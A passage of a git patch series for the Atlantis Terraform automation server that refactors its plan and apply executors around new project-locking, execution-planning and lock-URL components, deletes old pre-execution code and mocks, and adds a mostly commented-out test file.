+	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/logging"
+)
+
+type ApplyRequirement interface {
+	// IsMet returns true if the requirement is met and false if not.
+	// If it returns false, it also returns a string describing why not.
+	IsMet() (bool, string)
+}
+
+type PlanStage struct {
+	Steps []Step
+}
+
+type ApplyStage struct {
+	Steps             []Step
+	ApplyRequirements []ApplyRequirement
+}
+
+func (p PlanStage) Run() (string, error) {
+	var outputs string
+	for _, step := range p.Steps {
+		out, err := step.Run()
+		if err != nil {
+			return outputs, err
+		}
+		if out != "" {
+			// Outputs are separated by newlines.
+			outputs += "\n" + out
+		}
+	}
+	return outputs, nil
+}
+
+func (a ApplyStage) Run() (string, error) {
+	var outputs string
+	for _, step := range a.Steps {
+		out, err := step.Run()
+		if err != nil {
+			return outputs, err
+		}
+		if out != "" {
+			// Outputs are separated by newlines.
+			outputs += "\n" + out
+		}
+	}
+	return outputs, nil
+}
+
+type Step interface {
+	// Run runs the step. It returns any output that needs to be commented back
+	// onto the pull request and error.
+	Run() (string, error)
+}
+
+// StepMeta is the data that is available to all steps.
+type StepMeta struct {
+	Log       *logging.SimpleLogger
+	Workspace string
+	// AbsolutePath is the path to this project on disk. It's not necessarily
+	// the repository root since a project can be in a subdir of the root.
+	AbsolutePath string
+	// DirRelativeToRepoRoot is the directory for this project relative
+	// to the repo root.
+	DirRelativeToRepoRoot string
+	TerraformVersion      *version.Version
+	TerraformExecutor     TerraformExec
+	// ExtraCommentArgs are the arguments that may have been appended to the comment.
+	// For example 'atlantis plan -- -target=resource'. They are already quoted
+	// further up the call tree to mitigate security issues.
+	ExtraCommentArgs []string
+	// VCS username of who caused this step to be executed. For example the
+	// commenter, or who pushed a new commit.
+	Username string
+}
+
+// MustConstraint returns a constraint. It panics on error.
+func MustConstraint(constraint string) version.Constraints {
+	c, err := version.NewConstraint(constraint)
+	if err != nil {
+		panic(err)
+	}
+	return c
+}
diff --git a/testing/assertions.go b/testing/assertions.go
index efb2ce9b14..5b6ad147bd 100644
--- a/testing/assertions.go
+++ b/testing/assertions.go
@@ -73,7 +73,7 @@ func ErrContains(tb testing.TB, substr string, act error) {
 		tb.Fatalf("exp err to contain %q but err was nil", substr)
 	}
 	if !strings.Contains(act.Error(), substr) {
-		tb.Fatalf("exp err %q to contain $q", act.Error(), substr)
+		tb.Fatalf("exp err %q to contain %q", act.Error(), substr)
 	}
 }
 

From 2175b50472f3ec788dcfc4e7f51e98b27309cc30 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Tue, 5 Jun 2018 18:54:49 +0100
Subject: [PATCH 10/69] Use new steps in plan/apply

- Fix lockURL issues by adding new Router object.
- Use new ProjectLocker and delete PreProjectExecutor.
---
 server/events/apply_executor.go               | 125 +++-----
 server/events/command_handler.go              |   6 -
 .../mocks/matchers/events_preexecuteresult.go |  20 --
 .../events/mocks/mock_lock_url_generator.go   |  35 ++-
 .../events/mocks/mock_project_pre_executor.go |  85 ------
 server/events/plan_executor.go                | 117 ++------
 server/events/plan_executor_test.go           |   3 -
 server/events/project_locker.go               |  87 ++++++
 server/events/project_locker_test.go          | 269 +++++++++++++++++
 server/events/project_pre_execute.go          | 140 ---------
 server/events/project_pre_execute_test.go     | 282 ------------------
 server/router.go                              |  31 ++
 server/server.go                              |  60 ++--
 server/server_test.go                         |   2 +-
 14 files changed, 509 insertions(+), 753 deletions(-)
 delete mode 100644 server/events/mocks/matchers/events_preexecuteresult.go
 delete mode 100644 server/events/mocks/mock_project_pre_executor.go
 create mode 100644 server/events/project_locker.go
 create mode 100644 server/events/project_locker_test.go
 delete mode 100644 server/events/project_pre_execute.go
 delete mode 100644 server/events/project_pre_execute_test.go
 create mode 100644 server/router.go

diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go
index 0ca0dc044f..534546997d 100644
--- a/server/events/apply_executor.go
+++ b/server/events/apply_executor.go
@@ -14,12 +14,8 @@
 package events
 
 import (
-	"fmt"
-	"os"
-	"path/filepath"
-
-	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	"github.com/runatlantis/atlantis/server/events/run"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
@@ -33,22 +29,23 @@ type ApplyExecutor struct {
 	RequireApproval   bool
 	Run               *run.Run
 	AtlantisWorkspace AtlantisWorkspace
-	ProjectPreExecute *DefaultProjectPreExecutor
+	ProjectLocker     *DefaultProjectLocker
 	Webhooks          webhooks.Sender
+	ExecutionPlanner  *repoconfig.ExecutionPlanner
 }
 
 // Execute executes apply for the ctx.
 func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse {
-	if a.RequireApproval {
-		approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull)
-		if err != nil {
-			return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")}
-		}
-		if !approved {
-			return CommandResponse{Failure: "Pull request must be approved before running apply."}
-		}
-		ctx.Log.Info("confirmed pull request was approved")
-	}
+	//if a.RequireApproval {
+	//	approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull)
+	//	if err != nil {
+	//		return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")}
+	//	}
+	//	if !approved {
+	//		return CommandResponse{Failure: "Pull request must be approved before running apply."}
+	//	}
+	//	ctx.Log.Info("confirmed pull request was approved")
+	//}
 
 	repoDir, err := a.AtlantisWorkspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace)
 	if err != nil {
@@ -56,78 +53,33 @@ func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse {
 	}
 	ctx.Log.Info("found workspace in %q", repoDir)
 
-	// Plans are stored at project roots by their workspace names. We just
-	// need to find them.
-	var plans []models.Plan
-	// If they didn't specify a directory, we apply all plans we can find for
-	// this workspace.
-	if ctx.Command.Dir == "" {
-		err = filepath.Walk(repoDir, func(path string, info os.FileInfo, err error) error {
-			if err != nil {
-				return err
-			}
-			// Check if the plan is for the right workspace,
-			if !info.IsDir() && info.Name() == ctx.Command.Workspace+".tfplan" {
-				rel, _ := filepath.Rel(repoDir, filepath.Dir(path))
-				plans = append(plans, models.Plan{
-					Project:   models.NewProject(ctx.BaseRepo.FullName, rel),
-					LocalPath: path,
-				})
-			}
-			return nil
-		})
-		if err != nil {
-			return CommandResponse{Error: errors.Wrap(err, "finding plans")}
-		}
-	} else {
-		// If they did specify a dir, we apply just the plan in that directory
-		// for this workspace.
-		planPath := filepath.Join(repoDir, ctx.Command.Dir, ctx.Command.Workspace+".tfplan")
-		stat, err := os.Stat(planPath)
-		if err != nil || stat.IsDir() {
-			return CommandResponse{Error: fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.Command.Dir, ctx.Command.Workspace)}
-		}
-		relProjectPath, _ := filepath.Rel(repoDir, filepath.Dir(planPath))
-		plans = append(plans, models.Plan{
-			Project:   models.NewProject(ctx.BaseRepo.FullName, relProjectPath),
-			LocalPath: planPath,
-		})
-	}
-	if len(plans) == 0 {
-		return CommandResponse{Failure: "No plans found for that workspace."}
-	}
-	var paths []string
-	for _, p := range plans {
-		paths = append(paths, p.LocalPath)
+	stage, err := a.ExecutionPlanner.BuildApplyStage(ctx.Log, repoDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username)
+	if err != nil {
+		return CommandResponse{Error: err}
 	}
-	ctx.Log.Info("found %d plan(s) in our workspace: %v", len(plans), paths)
 
-	var results []ProjectResult
-	for _, plan := range plans {
-		ctx.Log.Info("running apply for project at path %q", plan.Project.Path)
-		result := a.apply(ctx, repoDir, plan)
-		result.Path = plan.LocalPath
-		results = append(results, result)
+	// check if we have the lock
+	tryLockResponse, err := a.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir))
+	if err != nil {
+		return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}}
+	}
+	if !tryLockResponse.LockAcquired {
+		return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}}
 	}
-	return CommandResponse{ProjectResults: results}
-}
 
-func (a *ApplyExecutor) apply(ctx *CommandContext, repoDir string, plan models.Plan) ProjectResult {
-	preExecute := a.ProjectPreExecute.Execute(ctx, repoDir, plan.Project)
-	if preExecute.ProjectResult != (ProjectResult{}) {
-		return preExecute.ProjectResult
+	// Check apply requirements.
+	for _, req := range stage.ApplyRequirements {
+		isMet, reason := req.IsMet()
+		if !isMet {
+			return CommandResponse{Failure: reason}
+		}
 	}
-	config := preExecute.ProjectConfig
-	terraformVersion := preExecute.TerraformVersion
 
-	applyExtraArgs := config.GetExtraArguments(ctx.Command.Name.String())
-	absolutePath := filepath.Join(repoDir, plan.Project.Path)
-	workspace := ctx.Command.Workspace
-	tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, applyExtraArgs...), ctx.Command.Flags...), plan.LocalPath)
-	output, err := a.Terraform.RunCommandWithVersion(ctx.Log, absolutePath, tfApplyCmd, terraformVersion, workspace)
+	out, err := stage.Run()
 
+	// Send webhooks even if there's an error.
 	a.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck
-		Workspace: workspace,
+		Workspace: ctx.Command.Workspace,
 		User:      ctx.User,
 		Repo:      ctx.BaseRepo,
 		Pull:      ctx.Pull,
@@ -135,16 +87,7 @@ func (a *ApplyExecutor) apply(ctx *CommandContext, repoDir string, plan models.P
 	})
 
 	if err != nil {
-		return ProjectResult{Error: fmt.Errorf("%s\n%s", err.Error(), output)}
+		return CommandResponse{Error: err}
 	}
-	ctx.Log.Info("apply succeeded")
-
-	if len(config.PostApply) > 0 {
-		_, err := a.Run.Execute(ctx.Log, config.PostApply, absolutePath, workspace, terraformVersion, "post_apply")
-		if err != nil {
-			return ProjectResult{Error: errors.Wrap(err, "running post apply commands")}
-		}
-	}
-
-	return ProjectResult{ApplySuccess: output}
+	return CommandResponse{ProjectResults: []ProjectResult{{ApplySuccess: out}}}
 }
diff --git a/server/events/command_handler.go b/server/events/command_handler.go
index 52dd2090bd..047d5f936a 100644
--- a/server/events/command_handler.go
+++ b/server/events/command_handler.go
@@ -55,7 +55,6 @@ type GitlabMergeRequestGetter interface {
 type CommandHandler struct {
 	PlanExecutor             Executor
 	ApplyExecutor            Executor
-	LockURLGenerator         LockURLGenerator
 	VCSClient                vcs.ClientProxy
 	GithubPullGetter         GithubPullGetter
 	GitlabMergeRequestGetter GitlabMergeRequestGetter
@@ -137,11 +136,6 @@ func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging.
 	return logging.NewSimpleLogger(src, c.Logger.Underlying(), true, c.Logger.GetLevel())
 }
 
-// SetLockURL sets a function that's used to return the URL for a lock.
-func (c *CommandHandler) SetLockURL(f func(id string) (url string)) {
-	c.LockURLGenerator.SetLockURL(f)
-}
-
 func (c *CommandHandler) run(ctx *CommandContext) {
 	log := c.buildLogger(ctx.BaseRepo.FullName, ctx.Pull.Num)
 	ctx.Log = log
diff --git a/server/events/mocks/matchers/events_preexecuteresult.go b/server/events/mocks/matchers/events_preexecuteresult.go
deleted file mode 100644
index b8be09b1a2..0000000000
--- a/server/events/mocks/matchers/events_preexecuteresult.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
-	"reflect"
-
-	"github.com/petergtz/pegomock"
-	events "github.com/runatlantis/atlantis/server/events"
-)
-
-func AnyEventsPreExecuteResult() events.PreExecuteResult {
-	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.PreExecuteResult))(nil)).Elem()))
-	var nullValue events.PreExecuteResult
-	return nullValue
-}
-
-func EqEventsPreExecuteResult(value events.PreExecuteResult) events.PreExecuteResult {
-	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
-	var nullValue events.PreExecuteResult
-	return nullValue
-}
diff --git a/server/events/mocks/mock_lock_url_generator.go b/server/events/mocks/mock_lock_url_generator.go
index 0a31fc85f8..8a62a2c3b2 100644
--- a/server/events/mocks/mock_lock_url_generator.go
+++ b/server/events/mocks/mock_lock_url_generator.go
@@ -17,9 +17,16 @@ func NewMockLockURLGenerator() *MockLockURLGenerator {
 	return &MockLockURLGenerator{fail: pegomock.GlobalFailHandler}
 }
 
-func (mock *MockLockURLGenerator) SetLockURL(_param0 func(string) string) {
-	params := []pegomock.Param{_param0}
-	pegomock.GetGenericMockFrom(mock).Invoke("SetLockURL", params, []reflect.Type{})
+func (mock *MockLockURLGenerator) GenerateLockURL(lockID string) string {
+	params := []pegomock.Param{lockID}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("GenerateLockURL", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem()})
+	var ret0 string
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(string)
+		}
+	}
+	return ret0
 }
 
 func (mock *MockLockURLGenerator) VerifyWasCalledOnce() *VerifierLockURLGenerator {
@@ -40,28 +47,28 @@ type VerifierLockURLGenerator struct {
 	inOrderContext         *pegomock.InOrderContext
 }
 
-func (verifier *VerifierLockURLGenerator) SetLockURL(_param0 func(string) string) *LockURLGenerator_SetLockURL_OngoingVerification {
-	params := []pegomock.Param{_param0}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "SetLockURL", params)
-	return &LockURLGenerator_SetLockURL_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+func (verifier *VerifierLockURLGenerator) GenerateLockURL(lockID string) *LockURLGenerator_GenerateLockURL_OngoingVerification {
+	params := []pegomock.Param{lockID}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GenerateLockURL", params)
+	return &LockURLGenerator_GenerateLockURL_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
 }
 
-type LockURLGenerator_SetLockURL_OngoingVerification struct {
+type LockURLGenerator_GenerateLockURL_OngoingVerification struct {
 	mock              *MockLockURLGenerator
 	methodInvocations []pegomock.MethodInvocation
 }
 
-func (c *LockURLGenerator_SetLockURL_OngoingVerification) GetCapturedArguments() func(string) string {
-	_param0 := c.GetAllCapturedArguments()
-	return _param0[len(_param0)-1]
+func (c *LockURLGenerator_GenerateLockURL_OngoingVerification) GetCapturedArguments() string {
+	lockID := c.GetAllCapturedArguments()
+	return lockID[len(lockID)-1]
 }
 
-func (c *LockURLGenerator_SetLockURL_OngoingVerification) GetAllCapturedArguments() (_param0 []func(string) string) {
+func (c *LockURLGenerator_GenerateLockURL_OngoingVerification) GetAllCapturedArguments() (_param0 []string) {
 	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
 	if len(params) > 0 {
-		_param0 = make([]func(string) string, len(params[0]))
+		_param0 = make([]string, len(params[0]))
 		for u, param := range params[0] {
-			_param0[u] = param.(func(string) string)
+			_param0[u] = param.(string)
 		}
 	}
 	return
diff --git a/server/events/mocks/mock_project_pre_executor.go b/server/events/mocks/mock_project_pre_executor.go
deleted file mode 100644
index cd36116f3a..0000000000
--- a/server/events/mocks/mock_project_pre_executor.go
+++ /dev/null
@@ -1,85 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectPreExecutor)
-
-package mocks
-
-import (
-	"reflect"
-
-	pegomock "github.com/petergtz/pegomock"
-	events "github.com/runatlantis/atlantis/server/events"
-	models "github.com/runatlantis/atlantis/server/events/models"
-)
-
-type MockProjectPreExecutor struct {
-	fail func(message string, callerSkip ...int)
-}
-
-func NewMockProjectPreExecutor() *MockProjectPreExecutor {
-	return &MockProjectPreExecutor{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockProjectPreExecutor) Execute(ctx *events.CommandContext, repoDir string, project models.Project) events.PreExecuteResult {
-	params := []pegomock.Param{ctx, repoDir, project}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.PreExecuteResult)(nil)).Elem()})
-	var ret0 events.PreExecuteResult
-	if len(result) != 0 {
-		if result[0] != nil {
-			ret0 = result[0].(events.PreExecuteResult)
-		}
-	}
-	return ret0
-}
-
-func (mock *MockProjectPreExecutor) VerifyWasCalledOnce() *VerifierProjectPreExecutor {
-	return &VerifierProjectPreExecutor{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockProjectPreExecutor) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectPreExecutor {
-	return &VerifierProjectPreExecutor{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockProjectPreExecutor) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectPreExecutor {
-	return &VerifierProjectPreExecutor{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierProjectPreExecutor struct {
-	mock                   *MockProjectPreExecutor
-	invocationCountMatcher pegomock.Matcher
-	inOrderContext         *pegomock.InOrderContext
-}
-
-func (verifier *VerifierProjectPreExecutor) Execute(ctx *events.CommandContext, repoDir string, project models.Project) *ProjectPreExecutor_Execute_OngoingVerification {
-	params := []pegomock.Param{ctx, repoDir, project}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params)
-	return &ProjectPreExecutor_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type ProjectPreExecutor_Execute_OngoingVerification struct {
-	mock              *MockProjectPreExecutor
-	methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *ProjectPreExecutor_Execute_OngoingVerification) GetCapturedArguments() (*events.CommandContext, string, models.Project) {
-	ctx, repoDir, project := c.GetAllCapturedArguments()
-	return ctx[len(ctx)-1], repoDir[len(repoDir)-1], project[len(project)-1]
-}
-
-func (c *ProjectPreExecutor_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []string, _param2 []models.Project) {
-	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
-	if len(params) > 0 {
-		_param0 = make([]*events.CommandContext, len(params[0]))
-		for u, param := range params[0] {
-			_param0[u] = param.(*events.CommandContext)
-		}
-		_param1 = make([]string, len(params[1]))
-		for u, param := range params[1] {
-			_param1[u] = param.(string)
-		}
-		_param2 = make([]models.Project, len(params[2]))
-		for u, param := range params[2] {
-			_param2[u] = param.(models.Project)
-		}
-	}
-	return
-}
diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go
index 478de10a22..d994021723 100644
--- a/server/events/plan_executor.go
+++ b/server/events/plan_executor.go
@@ -15,12 +15,10 @@ package events
 
 import (
 	"fmt"
-	"os"
-	"path/filepath"
 
-	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/locking"
 	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	"github.com/runatlantis/atlantis/server/events/run"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
@@ -28,27 +26,21 @@ import (
 
 //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator
 
-// LockURLGenerator consumes lock URLs.
 type LockURLGenerator interface {
-	// SetLockURL takes a function that given a lock id, will return a url
-	// to view that lock.
-	SetLockURL(func(id string) (url string))
+	GenerateLockURL(lockID string) string
 }
 
-// atlantisUserTFVar is the name of the variable we execute terraform
-// with, containing the vcs username of who is running the command
-const atlantisUserTFVar = "atlantis_user"
-
-// PlanExecutor handles everything related to running terraform plan.
+/**/ // PlanExecutor handles everything related to running terraform plan.
 type PlanExecutor struct {
-	VCSClient         vcs.ClientProxy
-	Terraform         terraform.Client
-	Locker            locking.Locker
-	LockURL           func(id string) (url string)
-	Run               run.Runner
-	Workspace         AtlantisWorkspace
-	ProjectPreExecute ProjectPreExecutor
-	ProjectFinder     ProjectFinder
+	VCSClient        vcs.ClientProxy
+	Terraform        terraform.Client
+	Locker           locking.Locker
+	Run              run.Runner
+	Workspace        AtlantisWorkspace
+	ProjectFinder    ProjectFinder
+	ProjectLocker    ProjectLocker
+	ExecutionPlanner *repoconfig.ExecutionPlanner
+	LockURLGenerator LockURLGenerator
 }
 
 // PlanSuccess is the result of a successful plan.
@@ -57,12 +49,6 @@ type PlanSuccess struct {
 	LockURL         string
 }
 
-// SetLockURL takes a function that given a lock id, will return a url
-// to view that lock.
-func (p *PlanExecutor) SetLockURL(f func(id string) (url string)) {
-	p.LockURL = f
-}
-
 // Execute executes terraform plan for the ctx.
 func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse {
 	cloneDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace)
@@ -70,79 +56,32 @@ func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse {
 		return CommandResponse{Error: err}
 	}
 
-	var projects []models.Project
-	if ctx.Command.Dir == "" {
-		// If they didn't specify a directory to plan in, figure out what
-		// projects have been modified so we know where to run plan.
-		modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull)
-		if err != nil {
-			return CommandResponse{Error: errors.Wrap(err, "getting modified files")}
-		}
-		ctx.Log.Info("found %d files modified in this pull request", len(modifiedFiles))
-		projects = p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, cloneDir)
-		if len(projects) == 0 {
-			return CommandResponse{Failure: "No Terraform files were modified."}
-		}
-	} else {
-		projects = []models.Project{{
-			Path:         ctx.Command.Dir,
-			RepoFullName: ctx.BaseRepo.FullName,
-		}}
+	stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username)
+	if err != nil {
+		return CommandResponse{Error: err}
 	}
 
-	var results []ProjectResult
-	for _, project := range projects {
-		ctx.Log.Info("running plan for project at path %q", project.Path)
-		result := p.plan(ctx, cloneDir, project)
-		result.Path = project.Path
-		results = append(results, result)
+	tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir))
+	if err != nil {
+		return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}}
 	}
-	return CommandResponse{ProjectResults: results}
-}
-
-func (p *PlanExecutor) plan(ctx *CommandContext, repoDir string, project models.Project) ProjectResult {
-	preExecute := p.ProjectPreExecute.Execute(ctx, repoDir, project)
-	if preExecute.ProjectResult != (ProjectResult{}) {
-		return preExecute.ProjectResult
+	if !tryLockResponse.LockAcquired {
+		return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}}
 	}
-	config := preExecute.ProjectConfig
-	terraformVersion := preExecute.TerraformVersion
-	workspace := ctx.Command.Workspace
 
-	// Run terraform plan.
-	planFile := filepath.Join(repoDir, project.Path, fmt.Sprintf("%s.tfplan", workspace))
-	userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username)
-	planExtraArgs := config.GetExtraArguments(ctx.Command.Name.String())
-	tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, planExtraArgs...), ctx.Command.Flags...)
-
-	// Check if env/{workspace}.tfvars exist.
-	envFileName := filepath.Join("env", workspace+".tfvars")
-	if _, err := os.Stat(filepath.Join(repoDir, project.Path, envFileName)); err == nil {
-		tfPlanCmd = append(tfPlanCmd, "-var-file", envFileName)
-	}
-	output, err := p.Terraform.RunCommandWithVersion(ctx.Log, filepath.Join(repoDir, project.Path), tfPlanCmd, terraformVersion, workspace)
+	out, err := stage.Run()
 	if err != nil {
 		// Plan failed so unlock the state.
-		if _, unlockErr := p.Locker.Unlock(preExecute.LockResponse.LockKey); unlockErr != nil {
-			ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
+		if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil {
+			ctx.Log.Err("error unlocking state after plan error: %s", unlockErr)
 		}
-		return ProjectResult{Error: fmt.Errorf("%s\n%s", err.Error(), output)}
+		return CommandResponse{ProjectResults: []ProjectResult{{Error: fmt.Errorf("%s\n%s", err.Error(), out)}}}
 	}
-	ctx.Log.Info("plan succeeded")
 
-	// If there are post plan commands then run them.
-	if len(config.PostPlan) > 0 {
-		absolutePath := filepath.Join(repoDir, project.Path)
-		_, err := p.Run.Execute(ctx.Log, config.PostPlan, absolutePath, workspace, terraformVersion, "post_plan")
-		if err != nil {
-			return ProjectResult{Error: errors.Wrap(err, "running post plan commands")}
-		}
-	}
-
-	return ProjectResult{
+	return CommandResponse{ProjectResults: []ProjectResult{{
 		PlanSuccess: &PlanSuccess{
-			TerraformOutput: output,
-			LockURL:         p.LockURL(preExecute.LockResponse.LockKey),
+			TerraformOutput: out,
+			LockURL:         p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey),
 		},
-	}
+	}}}
 }
diff --git a/server/events/plan_executor_test.go b/server/events/plan_executor_test.go
index 24e5452c9b..c9a209fe64 100644
--- a/server/events/plan_executor_test.go
+++ b/server/events/plan_executor_test.go
@@ -284,8 +284,5 @@ func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClie
 		Locker:            locker,
 		Run:               run,
 	}
-	p.LockURL = func(id string) (url string) {
-		return "lockurl-" + id
-	}
 	return &p, runner, locker
 }
diff --git a/server/events/project_locker.go b/server/events/project_locker.go
new file mode 100644
index 0000000000..9b7060585b
--- /dev/null
+++ b/server/events/project_locker.go
@@ -0,0 +1,87 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//    http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+	"fmt"
+
+	"github.com/runatlantis/atlantis/server/events/locking"
+	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/run"
+	"github.com/runatlantis/atlantis/server/events/terraform"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_lock.go ProjectLocker
+
+// ProjectLocker locks this project against other plans being run until this
+// project is unlocked.
+type ProjectLocker interface {
+	// TryLock attempts to acquire the lock for this project. It returns true if the lock
+	// was acquired. If it returns false, the lock was not acquired and the second
+	// return value will be a string describing why the lock was not acquired.
+	// The third return value is a function that can be called to unlock the
+	// lock. It will only be set if the lock was acquired. Any errors will set
+	// error.
+	TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error)
+}
+
+// DefaultProjectLocker implements ProjectLocker.
+type DefaultProjectLocker struct {
+	Locker       locking.Locker
+	ConfigReader ProjectConfigReader
+	Terraform    terraform.Client
+	Run          run.Runner
+}
+
+// TryLockResponse is the result of trying to lock a project.
+type TryLockResponse struct {
+	// LockAcquired is true if the lock was acquired.
+	LockAcquired bool
+	// LockFailureReason is the reason why the lock was not acquired. It will
+	// only be set if LockAcquired is false.
+	LockFailureReason string
+	// UnlockFn will unlock the lock created by the caller. This might be called
+	// if there is an error later and the caller doesn't want to continue to
+	// hold the lock.
+	UnlockFn func() error
+	// LockKey is the key for the lock if the lock was acquired.
+	LockKey string
+}
+
+// TryLock implements ProjectLocker.TryLock.
+func (p *DefaultProjectLocker) TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error) {
+	workspace := ctx.Command.Workspace
+	lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User)
+	if err != nil {
+		return nil, err
+	}
+	if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num {
+		failureMsg := fmt.Sprintf(
+			"This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.",
+			lockAttempt.CurrLock.Pull.Num)
+		return &TryLockResponse{
+			LockAcquired:      false,
+			LockFailureReason: failureMsg,
+		}, nil
+	}
+	ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey)
+	return &TryLockResponse{
+		LockAcquired: true,
+		UnlockFn: func() error {
+			_, err := p.Locker.Unlock(lockAttempt.LockKey)
+			return err
+		},
+		LockKey: lockAttempt.LockKey,
+	}, nil
+}
diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go
new file mode 100644
index 0000000000..fd95503487
--- /dev/null
+++ b/server/events/project_locker_test.go
@@ -0,0 +1,269 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//    http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+//import (
+//	. "github.com/petergtz/pegomock"
+//	. "github.com/runatlantis/atlantis/testing"
+//)
+
+//var ctx = events.CommandContext{
+//	Command: &events.Command{
+//		Name: events.Plan,
+//	},
+//	Log: logging.NewNoopLogger(),
+//}
+//var project = models.Project{}
+//
